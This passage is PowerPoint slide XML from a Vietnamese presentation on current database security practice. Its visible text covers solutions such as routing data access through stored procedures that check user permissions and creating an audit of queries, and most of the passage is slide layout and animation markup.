            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B1938C7-B2E7-549E-E912-38644658EDCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2698264"/>
            <a:ext cx="17602199" cy="7322035"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A30A6D46-ACB0-2733-44E2-062957C233C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6AB02A1-903A-CF45-36B0-4F2833611E8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="1554027" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A7F8837-FE9D-D995-F6A4-65DAA6032C5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2915208"/>
            <a:ext cx="11049000" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Gi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ải pháp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:ea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492C952F-5830-C262-DE02-E1A1A203006A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3455136"/>
            <a:ext cx="8478159" cy="4632037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" kern="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Như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" kern="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ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" kern="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đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" kern="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500" kern="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đề</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" kern="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500" kern="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cập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" kern="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500" kern="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trước</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" kern="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500" kern="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đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" kern="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t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="25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ính bảo mật của cơ sở dữ liệu không thể dựa vào bảo mật của các cấp độ hệ thống phần mềm khác. Cơ sở dữ liệu phải được tự bảo vệ càng nhiều càng tốt. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" kern="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Cách duy nhất để xem, chèn, sửa đổi hoặc xóa dữ liệu là thông qua các quy trình được lưu trữ, trong đó tất cả người dùng đều có quyền thực hiện các thủ tục</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" kern="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indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="25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Các thủ tục được lưu trữ có logic tích hợp để kiểm tra quyền và quyền của người dùng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" kern="1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p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="25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Thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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5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hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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5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tạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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1 audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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5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lưu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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5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lại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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5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tất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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5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cả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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5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các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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5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truy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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5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vấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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5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khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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5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cần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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5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thiết</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" b="1" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:effectLst/>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3C769EE5-76AF-F159-C45A-27C5CE80E0E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12656019" y="9513835"/>
            <a:ext cx="9863329" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tạo Database</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>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C15021DF-39F0-0758-F81A-8E026D0A79EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10207977" y="2734353"/>
            <a:ext cx="7455103" cy="6715633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4247631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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="4"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>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down)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="with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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="2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2" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="5" grpId="0"/>
      <p:bldP spid="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DA67E9-19B2-8B22-635C-5BA313E36576}"/>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383D57A9-1A61-2D00-7352-930408384EE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699680" y="-1470403"/>
            <a:ext cx="14026196" cy="11628992"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14026196" h="11628992">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14026196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14026196" y="11628992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116289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2" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{186113FE-99DB-6BE8-1B24-11404BAE9AE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D23533B-5DCD-0E32-6EB5-B4D0B56F14AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2698265"/>
            <a:ext cx="17602199" cy="6712434"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C52AB2B-D578-3FAD-5593-67DF3818D1BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADECB44-9566-4D63-2D2F-3C63679431D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="1554027" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CD02453-5E15-C5F7-0152-B59B1143F292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2915208"/>
            <a:ext cx="11049000" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Gi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ải pháp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:ea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B5B2B235-A6F6-A2FF-5F18-58B7D85631D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8189340" y="9493985"/>
            <a:ext cx="2743199" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tạo Audit</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400" b="1" i="0">
              <a:solidFill>
